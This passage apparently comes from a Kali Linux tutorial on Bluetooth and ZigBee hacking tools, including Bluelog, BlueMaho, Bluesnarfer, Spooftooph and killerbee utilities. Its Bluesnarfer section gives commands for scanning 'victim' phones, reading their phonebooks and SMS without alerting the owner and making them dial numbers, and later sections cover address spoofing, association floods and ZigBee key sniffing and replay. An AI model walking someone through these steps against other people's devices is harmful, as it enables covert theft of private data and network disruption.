- Reading phonebooks
- Writing phonebook entries
- Reading/decoding SMS stored on the device
- Setting call forward
- Initiating phone call
Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It’s intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.
Use the below command to see the nearby bluetooth device details in log file named btdevices.log
bluelog -i hci0 -o /root/Desktop/btdevices.log –v
This command provide Additional information including information of manufacturer, broadcast names and device class.
bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log –v
BlueMaho:Bluetooth Hacker App
BlueMaho is GUI-shell (interface) for suite of tools for testing security of bluetooth devices. It is freeware, opensource, written on python, uses wxPyhon. It can be used for testing BT-devices for known vulnerabilities and major thing to do – testing to find unknown vulns. Also it can form nice statistics.
BlueMaho, an integrated Bluetooth scanning/hacking tool. Here we will simply use it for scanning. You can start BlueMaho’s elegant GUI by typing:
When you do, it opens a GUI. Here, I have clicked on the “get SDP info” and hit the play button to the left. BlueMaho begins scanning for discoverable devices, and like the other tools, it finds two Bluetooth devices.
In the bottom window, BlueMaho displays more info from the scanned devices. I have copied that info and placed it into a text file to make it easier for you to read.
Note that it displays the name of the first device and then describes the device type as “Audio/Video, Headset profile.” Then identify second device and we are told its device type is “Phone, Smart phone.”
Now, that we know how to gather information on the Bluetooth devices in our range,
BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).
Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating. The recision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion.
Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):
[email protected]:~# blueranger.sh hci1 20:C9:D0:43:4B:D8Bluesnarfer
Bluesnarfer downloads the phone-book of any mobile device vulnerable to Bluesnarfing. If an mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data
Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):
[email protected]:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i
Hack Mobile Bluetooth Using Bluesnarfer
Check The Configuration
Scan for victims
hcitool scan hci0
Ping the vitcim device to see if device is awake
l2ping < Victim MAC Addr>
Browse the victim for rfcomm channels to connect to
sdptool browse –tree –l2cap < mac addr >
Then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
To see available opions to do
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >
Btscanner :Hack Bluetooth In Kali Linux
Btscanner tool can capture information from a Bluetooth device without pairing. You can download Btscanner using this Link. The setup is very small is size (only 1.05 MB) and easy to install. Btscanner search devices and show them on the screen and if you want to see more info just hit enter and it will show devices mac address.
1 Start your bluetooth with that command
Syntax:-service bluetooth start
2 Now open the btscanner with this command
Now you are here
3 Now see the instructions which are given below in my case press i . and your scan is started
4.Now you find the bluetooth device list
5.Now select with the arrow keys and press enter and get full info about the bluetooth.
RedFang is a small proof-of-concept application to find non discoverable Bluetooth devices. This is done by brute forcing the last six (6) bytes of the Bluetooth address of the device and doing a read_remote_name().
Scan the given range (-r 00803789EE76-00803789EEff) and discover Bluetooth devices (-s):
[email protected]:~# fang -r 00803789EE76-00803789EEff -s
Spooftooph is designed to automate spoofing or cloning Bluetooth device information. Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specifically the same Address).
Well normally most of us never intend to audit the Bluetooth stack in any organization. But this tool could be interesting to use in an environment where Bluetooth devices have been paired with important hardware.
Use the Bluetooth interface (-i hci1) to spoof itself as the given address (-a 00803789EE76):
[email protected]:~# spooftooph -i hci1 -a 00803789EE76
Other Wireless Tools
Transmit a flood of associate requests to a target network.
zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float]
zbassocflood -p 0xBAAD -c 11 -s 0.1
Decode plaintext key ZigBee delivery from a capture file. Will process libpcap or Daintree SNA capture files.
zbdsniff: Decode plaintext key ZigBee delivery from a capture file. Will process libpcap or Daintree SNA capture files
zbdsniff [capturefiles …]
A tcpdump-like tool for ZigBee/IEEE 802.15.4 networks
zbdump – a tcpdump-like tool for ZigBee/IEEE 802.15.4 networks Compatible with Wireshark 1.1.2 and later
zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]
zbfind provides a GTK-based GUI to the user which displays the results of a zbstumbler-like functionality. zbfind sends beacon requests as it cycles through channels and listens for a response, adding the response to a table as well as displaying signal strength on a gauge widget.
Search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet
zbgoodfind – search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet:
zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don’t skip 2-byte FCS at end of each frame] [-d genenerate binary file (test mode)]
Replay ZigBee/802.15.4 network traffic from libpcap or Daintree files
zbreplay: replay ZigBee/802.15.4 network traffic from libpcap or Daintree files:
zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]
Transmit beacon request frames to the broadcast address while channel hopping to identify ZC/ZR devices.